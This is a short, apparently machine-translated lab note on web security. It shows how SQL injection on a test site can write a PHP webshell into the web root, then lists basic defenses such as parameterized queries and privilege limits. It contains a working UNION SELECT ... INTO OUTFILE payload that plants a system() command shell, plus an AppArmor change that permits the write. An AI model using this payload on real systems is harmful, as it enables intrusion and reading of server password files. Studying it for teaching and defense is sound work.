Web security: SQL injection

SQL injection Get Webshell
Looking for SQL injection pages, where to operate the database
Writing SQL statements to a Web site
' Union select ', ' <?php system ($_get["cmd"]);? > ' into outfile '/var/www/myzoo/cmd.php '

I found that MySQL does not have write access, so I added permissions to MySQL in AppArmor
Vi/etc/apparmor.d/usr.sbin.mysqld
Added at the end of the file:/var/www/myzoo/* RW,
Then restart Apache Restart AppArmor
Re-injection

* In general, sniffer needs to use the benchmark function, based on the return time to determine the database table structure
* This site is directly exposed to the database table structure

The cmd.php file is then written to the Web root directory
Use this file to do what we want to do
For example: View the server all file password or other

Defense SQL injection Get Webshell:

1. If you are writing SQL statements, the variables entered by the user are not embedded directly into the SQL statement. Instead of passing this variable through parameters, it is possible to effectively prevent SQL injection attacks. That is, the user's input must not be directly embedded in the SQL statement. In contrast, the user's input must be filtered, or a parameterized statement is used to pass a user-entered variable.

2. General user and System user rights settings

3. Regular expressions validate user input, and so on.

Hash conflict DOS website attack next update

Web security: SQL injection